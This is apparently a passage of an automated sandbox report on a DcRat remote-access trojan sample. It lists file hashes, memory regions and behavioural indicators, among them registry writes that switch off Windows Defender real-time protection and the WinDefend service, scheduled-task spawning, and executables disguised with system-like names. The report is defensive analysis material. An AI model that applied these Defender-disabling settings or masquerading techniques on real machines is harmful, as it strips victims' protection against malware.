| SHA1 | 8ecb425b37c7925f00393583b574e283410b27e5 |
| SHA256 | 751bd3cbe0687acb6b7819cc2146ff23772fbb66205e7a0501209ef86a2513f2 |
| SHA512 | b935e127969f202750abac448e035e8938800eff2471c70a26d716ee03f4ee6f7f098334c13105f02215c05b468da53525b37ba844250f64d287699c9bdec265 |
memory/852-200-0x0000000000200000-0x0000000000424000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xjNnGM38uG.bat
| MD5 | e6c26c08ed5a7faed626b3d753ca97bb |
| SHA1 | f5300bcb18a3f2933aa553a1b478a7ce8d587b0a |
| SHA256 | 305e4578ef21d10bc0b86b98d9bb30ce1ca733ad2a0cb5824a840f780b6f6535 |
| SHA512 | 66a23eb46a03aab8295883f6b6e02e5a7e4edd04ab23c3c515753bed719f51b07f0f777aae78c31c24704f7e347baebd24047aa816ff2558bde54281fe9f830b |
memory/2140-207-0x0000000000220000-0x0000000000444000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\uuaNNDTqg5.bat
| MD5 | b7c9a10199d91306b98585ebbc7b0319 |
| SHA1 | fa54a12ff377e5cc5e084efd545b54dbf662a860 |
| SHA256 | 1a3584d8f3b32a4bea2314a4d7872bff923b48b4ef1f4110f8190c2daf8e232b |
| SHA512 | afd9f8f6551b9f6008260127ce0ba487fd7f8eb72b599c8c855ae70ac0d09df7aa36fbc3ca2a518a5cedaa8e4b9dcc73f20a921154c534d04589f8df1c6f80ba |
memory/2376-214-0x0000000000C20000-0x0000000000E44000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\dgWvFyiHB2.bat
| MD5 | e14c4926700d44b8e08e0ca05164e5c8 |
| SHA1 | 8ce0dd507f2382a91c27b158f938f24c078d626b |
| SHA256 | aa722a447610cadeb5dc0e31536dfa5e955f740db5be510fe49da6cdcc7c146e |
| SHA512 | 965ff0473de0afda4302f7b79d13ad1e654ea73d9c4834887a84b0502f03224c04cb6705ec13ab960dfd30ab66f56b753672684f1f227b7d18a9ca8480eabf3c |
C:\Users\Admin\AppData\Local\Temp\tebxeZNirC.bat
| MD5 | 77176a2f8916dbf320ece509674b9ac7 |
| SHA1 | 7090717508053605aecd9c60b6acf27396032e7d |
| SHA256 | 03cab28d558fae706a80b7fb00f6bc71b004e41b57e3b40943513bee9cbb9348 |
| SHA512 | 4bb38636ab2bc33699e76cba2e6391815a13e3741e20842bf85eb99443395ecafee2d8282e1490597842d5a98668cde9366245c8ee57d491d77f79dac753294e |
memory/2396-227-0x0000000001130000-0x0000000001354000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\uxMZkGAiOs.bat
| MD5 | 39e0ed5a3af2eb4718f1dcb2f4698eb1 |
| SHA1 | f1b926135d30a2929ad7a218cb1fe9c24c1acb7e |
| SHA256 | 54af2c33dfb8e9d228b2daab6cbd51f19f7fd6da5ff5b65aa4cced61ca25afd7 |
| SHA512 | f8aa40fcdbb3f580077394a05bfceb0e41ab712aa22494d5479f3655d1ea2f1a9c5763d1f292ac8742d6363febb78bc27f4d388b8e9c357bbea9addfeb8c4f55 |
memory/612-234-0x0000000000B60000-0x0000000000BB6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\WVE2eLfZN7.bat
| MD5 | 3d6de43c3906f5b40a81763df8af10d7 |
| SHA1 | 52b400efcffbaef2a91c1cd95775aaea8fc8b84e |
| SHA256 | 79ad1100e31e6b7bd25740319e0287c1d34ea07ffd1114864eb2dda00c3ce63c |
| SHA512 | 7186c1f40ff2f2b391b39ac3dd88e4682edc24be8a74eaea652e220f0b11187994205cb6d3c2942f2b6f69d9a1e5ef5c53ddf5e80de2645bc99427b643fa51cb |
C:\Users\Admin\AppData\Local\Temp\C0VS1u4WCC.bat
| MD5 | 144a498f347fa415fc6bbc05f6401e89 |
| SHA1 | 5ddc00e70c33fb6e31dd50af33de90ca3a86f8db |
| SHA256 | 22d12c0b4f91d170453d827ba2ca6a47c1c250e0c1ec99f85c822bdbbb51b412 |
| SHA512 | 1b05df596359c37bcf8a9d37c7046b980554250a4634c03509ffac37dbc8ef907a3190a21f24edc35c5c5e23a9cbc8d139c77e61725147635a25fc456ca822ea |
memory/964-255-0x00000000002F0000-0x0000000000514000-memory.dmp
memory/1040-260-0x00000000001E0000-0x0000000000404000-memory.dmp
memory/1584-265-0x0000000000E50000-0x0000000001074000-memory.dmp
memory/1792-270-0x0000000000390000-0x00000000005B4000-memory.dmp
memory/2332-275-0x0000000000130000-0x0000000000354000-memory.dmp
memory/2332-276-0x00000000007F0000-0x0000000000846000-memory.dmp
memory/592-281-0x00000000000C0000-0x00000000002E4000-memory.dmp
memory/592-282-0x00000000008D0000-0x0000000000926000-memory.dmp
memory/1536-287-0x0000000000860000-0x0000000000A84000-memory.dmp
memory/1536-288-0x000000001A6F0000-0x000000001A746000-memory.dmp
memory/2688-293-0x0000000001210000-0x0000000001434000-memory.dmp
memory/1668-298-0x0000000000590000-0x00000000005E6000-memory.dmp
memory/1584-323-0x00000000012A0000-0x00000000014C4000-memory.dmp
memory/3056-328-0x0000000000210000-0x0000000000434000-memory.dmp
memory/2352-333-0x0000000000840000-0x0000000000A64000-memory.dmp
memory/592-338-0x00000000013A0000-0x00000000015C4000-memory.dmp
memory/2776-343-0x00000000003B0000-0x00000000005D4000-memory.dmp
memory/2776-344-0x0000000002070000-0x00000000020C6000-memory.dmp
memory/2984-349-0x00000000003F0000-0x0000000000614000-memory.dmp
memory/2300-354-0x0000000000ED0000-0x00000000010F4000-memory.dmp
memory/1176-363-0x00000000003C0000-0x00000000005E4000-memory.dmp
memory/2308-368-0x0000000000FA0000-0x00000000011C4000-memory.dmp
memory/1160-373-0x00000000002E0000-0x0000000000504000-memory.dmp
memory/1780-378-0x0000000000330000-0x0000000000554000-memory.dmp
memory/3032-387-0x0000000000240000-0x0000000000464000-memory.dmp
memory/3032-388-0x0000000000630000-0x0000000000686000-memory.dmp
memory/888-393-0x00000000012D0000-0x00000000014F4000-memory.dmp
memory/888-394-0x0000000000760000-0x00000000007B6000-memory.dmp
memory/2704-403-0x0000000000430000-0x0000000000486000-memory.dmp
memory/2816-412-0x0000000000D50000-0x0000000000DA6000-memory.dmp
memory/560-421-0x0000000000270000-0x0000000000494000-memory.dmp
memory/3060-430-0x0000000000D90000-0x0000000000FB4000-memory.dmp
memory/852-435-0x00000000011D0000-0x00000000013F4000-memory.dmp
memory/1824-444-0x0000000000F00000-0x0000000001124000-memory.dmp
memory/2376-449-0x00000000012F0000-0x0000000001514000-memory.dmp
memory/2376-450-0x0000000000650000-0x00000000006A6000-memory.dmp
memory/2636-455-0x0000000001220000-0x0000000001444000-memory.dmp
memory/2636-456-0x0000000000B00000-0x0000000000B56000-memory.dmp
memory/2628-465-0x0000000000120000-0x0000000000344000-memory.dmp
memory/2628-466-0x0000000002220000-0x0000000002276000-memory.dmp
memory/2112-483-0x00000000001C0000-0x00000000003E4000-memory.dmp
memory/1156-496-0x00000000000D0000-0x00000000002F4000-memory.dmp
memory/2948-505-0x0000000000080000-0x00000000002A4000-memory.dmp
memory/2780-514-0x0000000000D50000-0x0000000000F74000-memory.dmp
memory/1072-523-0x0000000000590000-0x00000000005E6000-memory.dmp
memory/1688-528-0x00000000013D0000-0x00000000015F4000-memory.dmp
memory/2424-533-0x0000000000DA0000-0x0000000000FC4000-memory.dmp
memory/1820-546-0x0000000001080000-0x00000000012A4000-memory.dmp
memory/1372-551-0x00000000002B0000-0x00000000004D4000-memory.dmp
memory/472-556-0x00000000010E0000-0x0000000001304000-memory.dmp
memory/3064-557-0x0000000000CF0000-0x0000000000F14000-memory.dmp
memory/2460-562-0x0000000000FB0000-0x00000000011D4000-memory.dmp
memory/1580-567-0x0000000000710000-0x0000000000766000-memory.dmp
memory/2624-572-0x0000000000180000-0x00000000003A4000-memory.dmp
memory/2624-573-0x00000000007B0000-0x0000000000806000-memory.dmp
memory/2816-578-0x0000000000970000-0x0000000000B94000-memory.dmp
memory/1676-587-0x00000000001D0000-0x00000000003F4000-memory.dmp
memory/1608-592-0x0000000000D00000-0x0000000000D56000-memory.dmp
memory/2100-601-0x0000000000300000-0x0000000000524000-memory.dmp
memory/2144-606-0x0000000000A00000-0x0000000000C24000-memory.dmp
memory/2080-607-0x00000000010F0000-0x0000000001314000-memory.dmp
memory/2676-616-0x0000000000AF0000-0x0000000000B46000-memory.dmp
memory/2396-621-0x0000000000020000-0x0000000000244000-memory.dmp
memory/1572-630-0x00000000011A0000-0x00000000013C4000-memory.dmp
memory/2816-639-0x00000000001A0000-0x00000000003C4000-memory.dmp
memory/1712-644-0x00000000012C0000-0x00000000014E4000-memory.dmp
memory/1712-645-0x0000000001270000-0x00000000012C6000-memory.dmp
memory/2172-650-0x0000000000250000-0x0000000000474000-memory.dmp
memory/2220-655-0x0000000000840000-0x0000000000896000-memory.dmp
memory/2820-660-0x0000000001010000-0x0000000001234000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-22 19:12
Reported
2024-07-22 19:18
Platform
win10v2004-20240709-en
Max time kernel
247s
Max time network
299s
Command Line
Signatures
DcRat
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\FunCheker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\FunCheker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Recovery\WindowsRE\SppExtComObj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
